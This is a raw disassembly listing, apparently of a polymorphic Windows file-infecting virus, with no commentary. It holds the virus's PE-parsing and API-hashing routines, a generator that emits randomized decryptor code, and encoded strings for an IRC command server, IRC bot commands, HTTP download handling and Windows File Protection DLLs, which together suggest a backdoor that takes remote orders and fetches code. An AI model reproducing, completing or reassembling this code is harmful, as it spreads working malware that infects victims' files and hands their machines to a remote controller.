call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 55500000h, 70D08F72h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 73736D62h
dd 74706F70h, 4553550Ah, 4A712052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
dd 7F95D1CAh, 10A61429h, 3AAB5957h, 27B1FAE5h, 10A61413h
dd 38D82DBDh, 19h dup(0)
; =============== S U B R O U T I N E =======================================
sub_42B414 proc near ; CODE XREF: sub_42B4CA:loc_42B4B8�p
; sub_42B51B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_42B430: ; CODE XREF: sub_42B414+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_42B452
cmp eax, [edx+8]
jnb short loc_42B452
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_42B457
; ---------------------------------------------------------------------------
loc_42B452: ; CODE XREF: sub_42B414+23�j
; sub_42B414+28�j
add edx, 28h
loop loc_42B430
loc_42B457: ; CODE XREF: sub_42B414+3C�j
popa
retn 4
sub_42B414 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_42B4CA
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_42B472: ; CODE XREF: .rsrc:0042B479�j
cmp [eax], ebx
jz short loc_42B482
add eax, 4
loop loc_42B472
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_42B482: ; CODE XREF: .rsrc:0042B474�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_42B49C
loc_42B48C: ; CODE XREF: .rsrc:0042B494�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_42B48C
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_42B4CA
loc_42B49C: ; CODE XREF: .rsrc:0042B48A�j
; sub_42B4CA+34�j
cmp dword ptr [edx], 0
jz short loc_42B4A6
sub esi, [edx]
add esi, [edx+10h]
loc_42B4A6: ; CODE XREF: sub_42B4CA-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_42B4B5
push dword ptr [edx]
jmp short loc_42B4B8
; ---------------------------------------------------------------------------
loc_42B4B5: ; CODE XREF: sub_42B4CA-1B�j
push dword ptr [edx+10h]
loc_42B4B8: ; CODE XREF: sub_42B4CA-17�j
call sub_42B414
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_42B4CA
; =============== S U B R O U T I N E =======================================
sub_42B4CA proc near ; CODE XREF: .rsrc:0042B461�p
; FUNCTION CHUNK AT 0042B49C SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_42B51B
mov eax, [ebp+1042D0h]
call near ptr dword_42AB50+43h
call sub_42B507
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_42B500
mov [ebp+102410h], ebx
jmp short loc_42B49C
; ---------------------------------------------------------------------------
loc_42B500: ; CODE XREF: sub_42B4CA+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_42B4CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B507 proc near ; CODE XREF: sub_42B4CA+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_42B51B
xor ecx, ecx
retn
sub_42B507 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B51B proc near ; CODE XREF: sub_42B4CA+10�p
; sub_42B507+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_42B414
add edx, [ebp+1042F8h]
add edx, esi
loc_42B52F: ; CODE XREF: sub_42B51B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_42B640
cmp dword ptr [edx+10h], 0
jz locret_42B640
mov eax, [edx+0Ch]
push eax
call sub_42B414
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_42B555: ; CODE XREF: sub_42B51B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_42B575
cmp cl, 2Eh
jz short loc_42B564
loc_42B561: ; CODE XREF: sub_42B51B+58�j
inc eax
jmp short loc_42B555
; ---------------------------------------------------------------------------
loc_42B564: ; CODE XREF: sub_42B51B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_42B561
loc_42B575: ; CODE XREF: sub_42B51B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_42B638
cmp word ptr [eax-2], 3233h
jnz loc_42B638
push esi
cmp dword ptr [edx], 0
jnz short loc_42B598
mov ecx, [edx+10h]
jmp short loc_42B59A
; ---------------------------------------------------------------------------
loc_42B598: ; CODE XREF: sub_42B51B+76�j
mov ecx, [edx]
loc_42B59A: ; CODE XREF: sub_42B51B+7B�j
add esi, ecx
push ecx
call sub_42B414
add esi, [ebp+1042F8h]
loc_42B5A8: ; CODE XREF: sub_42B51B+90�j
; sub_42B51B+117�j
lodsd
test eax, eax
js short loc_42B5A8
jz loc_42B637
push dword ptr [ebp+1042F8h]
push eax
call sub_42B414
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_42B5D4: ; CODE XREF: sub_42B51B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_42B5EB
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_42B5D4
; ---------------------------------------------------------------------------
loc_42B5EB: ; CODE XREF: sub_42B51B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_42B631
cmp ebx, 0DB6E45A8h
jz short loc_42B631
cmp ebx, 0FFA13B59h
jz short loc_42B631
cmp ebx, 0ACB522D6h
jz short loc_42B631
cmp ebx, 0F358E993h
jz short loc_42B631
cmp ebx, 0F358E97Dh
jz short loc_42B631
cmp ebx, 0E1253F46h
jz short loc_42B631
cmp ebx, 0E1253F30h
jz short loc_42B631
call dword ptr [ebp+1042D4h]
loc_42B631: ; CODE XREF: sub_42B51B+D6�j
; sub_42B51B+DE�j ...
pop ebx
jmp loc_42B5A8
; ---------------------------------------------------------------------------
loc_42B637: ; CODE XREF: sub_42B51B+92�j
pop esi
loc_42B638: ; CODE XREF: sub_42B51B+60�j
; sub_42B51B+6C�j
add edx, 14h
jmp loc_42B52F
; ---------------------------------------------------------------------------
locret_42B640: ; CODE XREF: sub_42B51B+18�j
; sub_42B51B+22�j
retn
sub_42B51B endp
; ---------------------------------------------------------------------------
db 3, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_42B6D6
or ax, 2589h
jmp short loc_42B6E9
; ---------------------------------------------------------------------------
loc_42B6D6: ; CODE XREF: .rsrc:0042B6CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_42B6E5
or ax, 2531h
jmp short loc_42B6E9
; ---------------------------------------------------------------------------
loc_42B6E5: ; CODE XREF: .rsrc:0042B6DD�j
or ax, 2501h
loc_42B6E9: ; CODE XREF: .rsrc:0042B6D4�j
; .rsrc:0042B6E3�j
stosw
call near ptr dword_42B644+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_42B6FB proc near ; CODE XREF: .rsrc:0042BD47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_42B644+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_42B723
rdtsc
jmp short loc_42B725
; ---------------------------------------------------------------------------
loc_42B723: ; CODE XREF: sub_42B6FB+22�j
sub eax, eax
loc_42B725: ; CODE XREF: sub_42B6FB+26�j
stosd
retn
sub_42B6FB endp
; =============== S U B R O U T I N E =======================================
sub_42B727 proc near ; CODE XREF: .rsrc:loc_42BD51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_42B75A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_42B76C
; ---------------------------------------------------------------------------
loc_42B75A: ; CODE XREF: sub_42B727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_42B76C: ; CODE XREF: sub_42B727+31�j
retn
sub_42B727 endp
; =============== S U B R O U T I N E =======================================
sub_42B76D proc near ; CODE XREF: sub_42B7DF:loc_42B806�p
; sub_42B7DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_42B79B
; ---------------------------------------------------------------------------
loc_42B776: ; CODE XREF: sub_42B76D+44�j
mov al, 0FCh
jmp short loc_42B79A
; ---------------------------------------------------------------------------
loc_42B77A: ; CODE XREF: sub_42B76D+48�j
mov ax, 0EBh
stosw
jmp short loc_42B79B
; ---------------------------------------------------------------------------
loc_42B782: ; CODE XREF: sub_42B76D+4C�j
push 4
pop eax
call near ptr dword_42AB50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_42B79B
; ---------------------------------------------------------------------------
loc_42B798: ; CODE XREF: sub_42B76D+50�j
mov al, 90h
loc_42B79A: ; CODE XREF: sub_42B76D+B�j
; sub_42B76D+60�j ...
stosb
loc_42B79B: ; CODE XREF: sub_42B76D+7�j
; sub_42B76D+13�j ...
push 15h
pop eax
call near ptr dword_42AB50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_42B7DE
test dl, dl
jz short loc_42B776
dec dl
jz short loc_42B77A
dec dl
jz short loc_42B782
dec dl
jz short loc_42B798
dec dl
jz short loc_42B7CF
dec dl
jz short loc_42B7D6
dec dl
jz short loc_42B7DA
mov al, 0F9h
jmp short loc_42B79A
; ---------------------------------------------------------------------------
loc_42B7CF: ; CODE XREF: sub_42B76D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_42B79A
; ---------------------------------------------------------------------------
loc_42B7D6: ; CODE XREF: sub_42B76D+58�j
mov al, 0F5h
jmp short loc_42B79A
; ---------------------------------------------------------------------------
loc_42B7DA: ; CODE XREF: sub_42B76D+5C�j
mov al, 0F8h
jmp short loc_42B79A
; ---------------------------------------------------------------------------
locret_42B7DE: ; CODE XREF: sub_42B76D+40�j
retn
sub_42B76D endp
; =============== S U B R O U T I N E =======================================
sub_42B7DF proc near ; CODE XREF: .rsrc:loc_42BC28�p
; .rsrc:0042BDDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_42B7EF
add al, 4
loc_42B7EF: ; CODE XREF: sub_42B7DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_42B806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_42B806: ; CODE XREF: sub_42B7DF+1E�j
call sub_42B76D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_42B81D
mov ah, 29h
loc_42B81D: ; CODE XREF: sub_42B7DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_42B76D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_42B840
mov al, 86h
loc_42B840: ; CODE XREF: sub_42B7DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_42B854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_42B854: ; CODE XREF: sub_42B7DF+6C�j
retn
sub_42B7DF endp
; ---------------------------------------------------------------------------
loc_42B855: ; CODE XREF: sub_42C45B+183�p
lea edi, [ebp+1039CCh]
call sub_42B76D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_42B86F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_42B86F db 0F7h ; ÷ ; CODE XREF: .rsrc:0042B86A�j
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_42BB00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_42BB00: ; CODE XREF: .rsrc:0042BAF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_42BB17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_42BB54
; ---------------------------------------------------------------------------
loc_42BB17: ; CODE XREF: .rsrc:0042BB0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_42BB29
mov al, 29h
loc_42BB29: ; CODE XREF: .rsrc:0042BB25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_42BB4C
mov ah, 0C8h
loc_42BB4C: ; CODE XREF: .rsrc:0042BB48�j
or ah, [ebp+1039B9h]
stosw
loc_42BB54: ; CODE XREF: .rsrc:0042BB15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_42BBDD
call sub_42B76D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_42BB88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_42BBD5
; ---------------------------------------------------------------------------
loc_42BB88: ; CODE XREF: .rsrc:0042BB7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_42BBA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_42BBBA
; ---------------------------------------------------------------------------
loc_42BBA5: ; CODE XREF: .rsrc:0042BB92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_42BBBA: ; CODE XREF: .rsrc:0042BBA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_42BBCD
add ah, 8
loc_42BBCD: ; CODE XREF: .rsrc:0042BBC8�j
or ah, [ebp+1039BAh]
stosw
loc_42BBD5: ; CODE XREF: .rsrc:0042BB86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_42BBDD: ; CODE XREF: .rsrc:0042BB6A�j
call sub_42B76D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_42BBFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_42B76D
loc_42BBFC: ; CODE XREF: .rsrc:0042BBEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_42BC28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_42BC2D
; ---------------------------------------------------------------------------
loc_42BC28: ; CODE XREF: .rsrc:0042BC0F�j
call sub_42B7DF
loc_42BC2D: ; CODE XREF: .rsrc:0042BC26�j
call sub_42B76D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_42BC49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_42BC58
; ---------------------------------------------------------------------------
loc_42BC49: ; CODE XREF: .rsrc:0042BC3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_42BC58: ; CODE XREF: .rsrc:0042BC47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_42BC93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_42BC8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_42BC92
; ---------------------------------------------------------------------------
loc_42BC8A: ; CODE XREF: .rsrc:0042BC6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_42BC92: ; CODE XREF: .rsrc:0042BC88�j
stosb
loc_42BC93: ; CODE XREF: .rsrc:0042BC62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_42BCAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_42BCB7
; ---------------------------------------------------------------------------
loc_42BCAF: ; CODE XREF: .rsrc:0042BC9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_42BCB7: ; CODE XREF: .rsrc:0042BCAD�j
stosb
call sub_42B76D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_42BCF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_42BD0B
mov cl, 77h
jmp short loc_42BD0B
; ---------------------------------------------------------------------------
loc_42BCF0: ; CODE XREF: .rsrc:0042BCC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_42BD0B: ; CODE XREF: .rsrc:0042BCEA�j
; .rsrc:0042BCEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_42B76D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_42BD5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_42BD5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_42BD51
